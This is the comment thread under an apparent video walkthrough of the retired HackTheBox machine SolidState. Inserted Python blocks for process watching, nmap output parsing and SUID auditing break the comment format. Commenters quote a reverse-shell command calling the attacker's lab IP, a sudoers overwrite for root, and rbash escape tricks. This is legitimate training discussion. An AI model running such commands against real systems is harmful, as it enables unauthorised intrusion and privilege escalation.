HackTheBox - SolidState

  • Published: 12 Sep 2024

Comments • 86

  • @codebx 5 years ago +33

    I'm sure you already found this out since this was almost a year ago, but you should be able to install 'gcc-multilib' on your host (kali) instance, and then you can compile your C code with the '-m32' gcc flag, which will compile your binary as a 32-bit binary. That way you won't need a 32-bit machine lying around. Another quick tip is that sometimes you'll have glibc version incompatibilities, and you can use the gcc flag '-D_GNU_SOURCE', which should use more portable versions of glibc that will likely be compatible with the victim machine you're running the code on.

    • @lumenknotty6355 1 year ago +2

      Fuck, this saved my life for Haircut in 2023. I could not understand why it wasn't working. Thank you.

  • @TheCryptonian 4 years ago +3

    So glad I watch your videos after rooting! I spent far too long getting a reverse shell to work from the .py script - the dash trick was very cool and something I've made a note of for future reference!

  • @slythx5231 3 years ago +5

    18:21 the reverse shell didn't work because the "/bin/bash -c" is missing. It should be `os.system("/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.23/1234 0>&1'")`

  • @magnoliacomputerscience7334 6 years ago +5

    Probably my favorite box, sad they retired it :/ Love the vid, glad you can pass your knowledge down to the unlearned like me!

  • @Nilaats 6 years ago +32

    I was working this box while you were recording, the /bulb in the ssh login script was me lol

  • @onlyastron4ut 3 years ago +1

    This box was a lot of fun and was indeed fairly straightforward; my main problem was getting a stable shell as mindy, as I didn't escape rbash like you did. Nonetheless I rooted this box fairly quickly so that's a good thing!

  • @willframpton5955 5 years ago +26

    Nc didn't return the shell because you specified 15-24 in your IP address - not 14-23
    17:10

    • @CameronNoakes 3 years ago

      I noticed this as well - we are on the ball!

    • @HK-sw3vi 3 years ago +1

      that part made me anxious

    • @VoidBiscuit 2 years ago

      @@HK-sw3vi same lol

  • @_Skunkfoot_ 6 years ago +5

    Interesting. When you get the exploit to run, you get a shell, but it's still the mindy user right?
    I actually found some python code to connect back to my box and put that in the /opt/tmp.py. Then, in order to get a root shell, I used the james exploit to run /opt/tmp.py whenever someone logged in. This way, I got a reverse shell as root.
    Not saying this way is better, it's probably a lot of unnecessary work. I like seeing different ways to priv esc, I've never seen that dash method before!

  • @susnoname 2 years ago +1

    At 20:09 IppSec said that script runs every 3 minutes. Maybe I missed something, but where did he see that information?

  • @TheFunLee 3 years ago +1

    Just completed Solidstate yesterday and just watched this video.
    But I did try to use bash or /bin/bash for rbash-escaping, it didn't work for me. Seems bash is not in mindy's bin...

  • @brandonevans5123 2 years ago +1

    Thanks for the video! I think there might be another privesc method I couldn't find any discussion on, using CVE-2017-18190, since you can set up an ssh tunnel on port 631 to access the administration panel of CUPS 2.2.1. I might play around with it later and see, but if anyone else has tried this I would like to know!

  • @desktopt328 4 years ago

    Thanks for the great walkthrough as usual!
    I have one question though. I am not a Linux expert, but will any exploit you add to /etc/bash_completion.d be executed once a user logs in? Or is this just specific to the James exploit? I remember reading that you can get a shell using bashrc or bash_auto-completion (not sure) if you can write files to Linux using FTP or any service that would allow you to put files on the system. 26:10

  • @fairchild9able 5 years ago +2

    Good work Ipp. For anyone following along and not getting it make sure to log in with " ?????@10.10.10.51 -t bash --noprofile"

    • @paired7815 5 years ago

      thanks man

    • @wheeler90 4 years ago

      thanks needed that little push

    • @ShabazDraee 4 years ago

      hats off mate, well done!

  • @nmkkannan1256 4 years ago

    How can we know /bin/dash can be checked? Or is it a generic checklist-based approach?

  • @GeekyGizmo007 5 years ago

    Why in the world would 6 people downvote this...

  • @fyodordostoevsky5901 6 years ago +7

    Small inaccuracy escaping rbash, it's only because the exploit was run by another user; if it was a clean run you would have had to pop a rev shell from a James exploit or at least run it yourself in order to bypass it with ctrl-c.

    • @ippsec 6 years ago +2

      Yeah -- Unfortunately didn't notice another user was on the box until it was too late. I believe I explain it near the very end of the video after I manually cleared out the bash completion junk.

    • @fyodordostoevsky5901 6 years ago +1

      IppSec, word, as always great videos. I didn't watch the whole thing sorry if you already knew m8 I mostly wanted to clarify that to people saying other methods work such as noprofile.

    • @TsukiCTF 5 years ago +2

      have you tried using these too? -> ssh mindy@10.10.10.51 -t "/bin/sh" or ssh mindy@10.10.10.51 -t "bash --noprofile" # (two - before noprofile; youtube renders them like - on my screen if not looking close)

    • @GuiltySpark 5 years ago +3

      @@TsukiCTF `ssh mindy@10.10.10.51 -t "bash --noprofile"` worked for me, I'll have to remember this trick in the future

  • @mikewollmann 2 years ago +1

    22:00 shouldn't writing to sudoers be enough? Like:
    os.system('/bin/echo "mindy ALL=(ALL) NOPASSWD: ALL" > /etc/sudoers')
    sudo su -
    and ur root *shrug*

  • @desktopt328 4 years ago

    20:26 The script didn't catch the cron process apparently because the delay interval is so long that the cron starts and finishes before the script can detect it. I set the sleep period to .01 and it caught it! Simple yet very effective script. You used another script that does this automatically but in a more professional way, but I can't recall the script name :(
    And thannnnks dude :D

    • @ippsec 4 years ago +1

      Probably PSPY

    • @desktopt328 4 years ago

      @@ippsec Yes it is. Thanks :D
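The polling approach described in this thread (snapshot the process list, sleep, snapshot again, report what appeared) is essentially what pspy automates. The block below is an added example written for this page; it is not the commenter's script and not pspy. It reads /proc directly, diffs two snapshots, and reports each new process with its owner uid and command line, which is as useful for a defender auditing what root-owned cron jobs spawn as for the enumeration discussed here. The proc path and the sample snapshots are assumptions; the live watch loop only works on Linux.

```python
import os
import time


def snapshot_proc(proc_root="/proc"):
    """Return {pid: (owner_uid, cmdline)} for every process visible under proc_root."""
    procs = {}
    for entry in os.listdir(proc_root):
        if not entry.isdigit():
            continue  # skip /proc/self, /proc/sys and friends
        pid_dir = os.path.join(proc_root, entry)
        try:
            owner = os.stat(pid_dir).st_uid  # /proc/<pid> is owned by the process's uid
            with open(os.path.join(pid_dir, "cmdline"), "rb") as f:
                raw = f.read()
        except OSError:
            continue  # exited between listdir() and the read; short-lived cron children do this
        cmdline = raw.replace(b"\0", b" ").decode(errors="replace").strip()
        procs[int(entry)] = (owner, cmdline or "[kernel thread]")
    return procs


def new_processes(before, after):
    """Processes present in `after` but absent from `before`, as sorted (pid, uid, cmdline) tuples."""
    return sorted((pid, *after[pid]) for pid in after.keys() - before.keys())


def self_check(proc_root="/proc"):
    """Sanity check: the watcher must at least see its own process (None if proc_root is absent)."""
    if not os.path.isdir(proc_root):
        return None
    return os.getpid() in snapshot_proc(proc_root)


def watch(interval=0.01, duration=30.0, proc_root="/proc"):
    """Poll for `duration` seconds and print every newly seen process.

    The interval is the whole game: a job that starts and exits inside one sleep is never
    seen, which is why a long poll misses a cron child and a 0.01 s poll catches it.
    """
    seen = snapshot_proc(proc_root)
    deadline = time.monotonic() + duration
    while time.monotonic() < deadline:
        time.sleep(interval)
        current = snapshot_proc(proc_root)
        for pid, uid, cmdline in new_processes(seen, current):
            print(f"{time.strftime('%H:%M:%S')} pid={pid:<6} uid={uid:<5} {cmdline}")
        seen = current


if __name__ == "__main__":
    watch()
```

Run it in one terminal and wait out a cron period in another; anything that appears with uid 0 and a command line pointing at a writable script is exactly the condition a defender wants to find before anyone else does.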

  • @kaungkhantnyinyi9579 4 years ago +3

    bash doesn't work on my mindy shell x(

    • @MichaelImo 4 years ago

      same... I'm thinking they may have made changes to the box since this video came out.

    • @crn2815 4 years ago

      @@MichaelImo Since the box is retired... Use the james exploit to copy "/bin/bash" over to /home/mindy/bin. Since we know mindy's PATH is "/home/mindy/bin" we can run "bash" without any /'s. Maybe it had already been done and ippsec didn't notice, but I just tried out the box and that's the method I used!

  • @shakirali3647 6 years ago +10

    Hey
    Your simple nc reverse shell wasn't working because you entered the wrong IP in the first try

    • @_Skunkfoot_ 6 years ago +2

      True, but it wouldn't have given him a root shell anyway since he ran it as mindy

    • @ippsec 6 years ago +5

      As far as I remember, the /opt/tmp.py gets executed as root via a cron every 3 minutes. If I didn't typo, it should have worked.

    • @_Skunkfoot_ 6 years ago

      You're probably right, that's probably the way we're supposed to do it tbh. Probably something I didn't notice or overlooked. But I'm pretty sure if you try to python tmp.py, it will run as mindy and give you a shell with mindy's permissions iirc.

    • @mingzhangwang6459 6 years ago +1

      I tried to python tmp.py as mindy and it gave me a restricted shell.

    • @kab3800 4 years ago

      @@ippsec I can confirm that it works. If your vi is being weird like in my case (the backspace wasn't working) and luckily it had nano, so I modified the tmp.py with ippsec's earlier payload, waited and w00t! Thanks so much Ippsec!! I also followed the 'dash' and 'james' exploit!! You are too good!!!!!

  • @izaak791 5 years ago +1

    Thanks Ippsec for the always awesome tuts!
    I modified the command at 5:08-5:10 to make life easier for myself and anyone that may need this, as follows:
    grep -oP '\d{1,5}/tcp' NmapOutput.nmap | tr -d '\n' | sed 's/\/tcp/,/g' | sed 's/.$//'
    We could probably use it with backticks in a script to have it all in 1 line:
    nmap -p- --open 10.10.10.120 -T4 -oA NmapOutput3 && Portlist=`grep -oP '\d{1,5}/tcp' NmapOutput3.nmap | tr -d '\n' | sed 's/\/tcp/,/g' | sed 's/.$//'` && echo "value is:$Portlist" && nmap --script vuln -p$Portlist 10.10.10.120
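Added example, not the commenter's pipeline and not from the video: nmap's grepable format (the .gnmap file that -oA writes, or -oG) already puts every port of a host on one tab-separated line, so the port list can be pulled out without chaining grep, tr and sed over the .nmap file. The script below parses a constructed .gnmap sample (the host address is the one used in this thread; the port set, service names and timestamps are made up), keeps only entries in the wanted state, and builds the comma-separated argument for a follow-up `nmap -p` scan. Python is used instead of a one-liner only so the parsing can be tested.

```python
import re
from collections import defaultdict

# Constructed sample of nmap grepable output (-oG / the .gnmap half of -oA). Not real scan data.
SAMPLE_GNMAP = """\
# Nmap 7.94 scan initiated Thu Jan  1 00:00:00 2024 as: nmap -p- --open -oA NmapOutput 10.10.10.51
Host: 10.10.10.51 ()\tStatus: Up
Host: 10.10.10.51 ()\tPorts: 22/open/tcp//ssh///, 25/open/tcp//smtp///, 80/open/tcp//http///, \
110/open/tcp//pop3///, 119/open/tcp//nntp///, 4555/open/tcp//james-admin///, 631/filtered/tcp//ipp///\
\tIgnored State: closed (65528)
# Nmap done at Thu Jan  1 00:00:05 2024 -- 1 IP address (1 host up) scanned in 5.00 seconds
"""

HOST_FIELD = re.compile(r"^Host: (\S+)")          # first token after "Host: " is the address
PORTS_FIELD = re.compile(r"\tPorts: ([^\t]*)")    # the Ports field ends at the next tab
PORT_ENTRY = re.compile(r"(\d{1,5})/(\w+)/(tcp|udp)/")  # port/state/proto/... per entry


def ports_by_host(gnmap_text, want_state="open"):
    """Map each host to its sorted (port, proto) entries that are in want_state."""
    hosts = defaultdict(set)
    for line in gnmap_text.splitlines():
        host = HOST_FIELD.match(line)
        ports = PORTS_FIELD.search(line)
        if not (host and ports):
            continue  # comment lines and "Status: Up" lines carry no port data
        for port, state, proto in PORT_ENTRY.findall(ports.group(1)):
            if state == want_state:
                hosts[host.group(1)].add((int(port), proto))
    return {h: sorted(p) for h, p in hosts.items()}


def port_arg(gnmap_text, host, proto="tcp"):
    """Comma-separated port list for one host, ready to paste after `nmap -p`, e.g. '22,25,80'."""
    entries = ports_by_host(gnmap_text).get(host, [])
    return ",".join(str(port) for port, p in entries if p == proto)


if __name__ == "__main__":
    ports = port_arg(SAMPLE_GNMAP, "10.10.10.51")
    print(f"nmap -sC -sV -p{ports} 10.10.10.51")
```

A filtered port is deliberately left out of the default result and reported only when asked for, which is the part a `grep 'tcp'` over the .nmap file gets wrong once you drop `--open`.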

  • @VoidBiscuit 2 years ago

    "the path of least resistance" 😂

  • @CurrentlyObsessively 4 years ago

    4:26 ...I have done so much tr and sed for no reason... THERE'S A GNMAP OUTPUT?!?!? grep-able nmap format sounds so nice

  • @theodosistarlas7300 6 years ago +1

    Well, I'm kinda new to hacking and not so good. I have watched 4-5 of your videos and I'm curious how you learned that much, and if it's possible for a 17 year old like me to become a fantastic inspiration man like you in hacking. I want to ask where I should start and what the most useful knowledge is, cause I've tried for 1-2 weeks to take my first machine down and I suck, I start feeling shitty. I would like to hear some help on where to start or any tips to become better and understand the theory behind all this.
    Just 1 more question: can I try these machines when they become retired somewhere else? Just to understand it, cause I can't own machine or user :( so at least I want to practise

  • @Lipo55 4 years ago

    Hi, Ippsec, I don't understand how the "/opt/tmp.py" was executed without being in a cron job at 21:48. Can you tell me, please? Tks!

    • @aharonmo4188 4 years ago

      I also didn't understand that! How did you realize that the cron will execute every 3 min?

  • @nobodysroom3135 1 year ago

    The SUID bit on /bin/dash is not set now for this box, so I can't use it for privilege escalation. I think HTB must have changed this in the last month, that's really weird. Why didn't they just keep it?
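Two questions in this thread, whether anything dropped into /etc/bash_completion.d runs when a user logs in (asked under the 26:10 comment above) and whether /bin/dash still carries its SUID bit (the comment just above), both come down to file-permission facts that a defender can audit directly. The block below is an added example written for this page, not code from the video, from HTB or from any commenter. It walks a tree for setuid regular files, flags those named like a shell or interpreter, and lists files in a completion directory that group or others can write; bash-completion sources every file in that directory when an interactive shell starts, so a non-root writer there gets code executed in every such user's session. The interpreter allowlist and the temporary fixture tree are assumptions; on a real host run `suid_shells("/")` and `loosely_writable("/etc/bash_completion.d")`.

```python
import os
import stat
import tempfile

# Assumed baseline of interpreter names that should never be setuid; extend it for your estate.
SHELL_NAMES = {"sh", "bash", "dash", "zsh", "ksh", "csh", "python", "python2", "python3", "perl"}


def find_suid(root):
    """Yield (path, owner_uid) for every regular file under root with the setuid bit set."""
    for dirpath, _dirs, files in os.walk(root):
        for name in sorted(files):
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: judge the file itself, never follow symlinks
            except OSError:
                continue  # unreadable or vanished; skip rather than abort the whole walk
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                yield path, st.st_uid


def suid_shells(root):
    """Setuid files named like a shell or interpreter: whoever can run them runs as the owner."""
    return sorted(p for p, _uid in find_suid(root) if os.path.basename(p) in SHELL_NAMES)


def loosely_writable(directory):
    """Regular files in directory that group or others may write (e.g. a login-time script dir)."""
    hits = []
    for name in sorted(os.listdir(directory)):
        path = os.path.join(directory, name)
        st = os.lstat(path)
        if stat.S_ISREG(st.st_mode) and st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
            hits.append(path)
    return hits


def build_demo_tree():
    """Constructed fixture (not a real system): one setuid 'dash', one world-writable completion file."""
    root = tempfile.mkdtemp(prefix="priv-audit-")
    layout = {
        "bin/dash": 0o4755,                # setuid shell: finding
        "bin/ls": 0o755,                   # ordinary binary
        "bash_completion.d/james": 0o666,  # anyone can edit what every login sources: finding
        "bash_completion.d/git": 0o644,    # root-only write, fine
    }
    for rel, mode in layout.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as f:
            f.write("# placeholder\n")
        os.chmod(path, mode)
    return root


if __name__ == "__main__":
    demo = build_demo_tree()
    print("setuid shells:", suid_shells(demo))
    print("loosely writable completion files:", loosely_writable(os.path.join(demo, "bash_completion.d")))
```

Both checks are cheap enough to run from a cron job of their own and diff against a stored baseline, which is how the "it used to be setuid, now it isn't" observation above would show up on a host you administer.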

  • @TheLinuxOS 6 years ago +1

    amazing video (y) can u tell which screen recorder you are using?

  • @raulcpop 5 years ago

    I am doing this machine once again. You have gaps between ssh mindy and the rbash escape you used before the James exploit, and that's why you could escape it with the "bash" command.

  • @rolfvreijdenberger1639 3 years ago +2

    `BASH_CMDS[lala]=/bin/bash;lala;` will allow you to escape a restricted shell on older rbash versions

  • @8urnside 6 years ago +1

    thanks for another great video. So this py file is run every 3 mins. Nothing showed in the cron jobs, so aside from being curious as to what the file does due to the permissions, is there any way to identify files that are actioned by the system? thanks

    • @FelixPeters14188 4 years ago +1

      I found it by using pspy (github.com/DominicBreuker/pspy) and watching the process list

    • @mzynehtb7901 2 years ago

      @@FelixPeters14188 thanks a lot. I was struggling to find this information.

  • @user-gi2sb8xr8f 6 years ago +4

    Wow, I wish I was good at regex. More practice needed I guess.

  • @berndeckenfels 4 years ago

    Is the James exploit, which is waiting for a James login, supposed to get a James login by the box? Or can the file be dropped for something like a user crontab or similar?

  • @blevenzon 6 years ago +1

    Curious what keyboard are you using?

    • @ippsec 6 years ago +2

      Ducky Zero

    • @blevenzon 6 years ago +1

      IppSec thank you, it sounds fantastic lol

  • @rhausk 5 years ago

    lol @ 7:37. Did you win Netwars?

  • @MrGentlemanism 2 years ago

    Couldn't connect to the mail server using thunderbird..

  • @space_venture782 5 years ago

    I cannot nmap scan or ping the machine; some work fine and others don't in Hack The Box (all the configuration is super, I followed every step, why is that happening?)

  • @berndeckenfels 4 years ago

    I think 2>&1 in your reverse shell will take care of the errors landing in the host session and should better detach from the user term

  • @TimmyTSENGKaliOSCPpentest 3 years ago

    Can I use Evolution to see the email?

  • @matthewrice7590 5 years ago

    So how is it that you are able to serve a file from port 80 without having to configure port forwarding on your router?

    • @tejaszarekar9145 5 years ago +1

      there is no need for port forwarding on the router... This is happening inside the HTB VPN

    • @matthewrice7590 5 years ago

      tejas zarekar ah, of course...that makes sense. Thanks for the reply.

  • @nickm.5328 6 years ago

    no james escalation :/ still great vid!

  • @marcobrandoni8433 6 years ago +1

    Hello everybody, at 10:33 Ippsec types bash to escape the rbash. This trick doesn't work for me. Is anybody having the same issue? How did you guys bypass it? Thank you for your time/help

    • @marcobrandoni8433 6 years ago +4

      after trying harder I found this amazing link that solved the issue. I hope this will help someone else too :)
      speakerdeck.com/knaps/escape-from-shellcatraz-breaking-out-of-restricted-unix-shells?slide=9

    • @snydher 5 years ago

      @@marcobrandoni8433 Thanks buddy, still learning a lot ;)

    • @jlinscott5174 5 years ago +1

      That "bash --noprofile" did the trick! Thanks!

    • @zp300 5 years ago

      @@jlinscott5174 it should NOT work, he didn't reset the machine prior to working on it. The way to escape that is just "ssh mindy@10.10.10.51 bash" and you're good.

  • @howto...6298 4 years ago

    Hey ippsec can you help me...
    Every time I scan a machine with nmap it says "host seems down"... I don't know why

    • @wutangdaug 4 years ago

      First, you will need to log in to the VPN.
      Second of all, you need to make sure the machine is online. You can see the status of the machine from the dashboard.
      If you want to work on a retired machine, you will need VIP access my friend.

  • @bugr33d0_hunter8 5 years ago

    Haha, he said Nine vah. I thought it was where Jesus was from, Nineveh, or around there. I wonder if they secretly had internet then. Feels like just the other day. 👨‍💻

  • @marcuswysocki4967 5 years ago

    is there a list or database for all the additions you put on your nmap (for ex. -sC, -sV)? thanks!

    • @adogonz442 5 years ago

      search 'man nmap' on google

  • @tornikebarisovi3989 5 years ago

    After root, a python script is much simpler: open user.txt and root.txt with a py script and write it to a txt file

  • @cocosloan3748 4 years ago

    These comments OMG... You are all so smart but I doubt you can do 5% of what he's doing!

  • @romilthakkar404 1 year ago

    I got debian_chroot from (ssh username@IP -t "bash --noprofile"). Not from typing bash in mindy.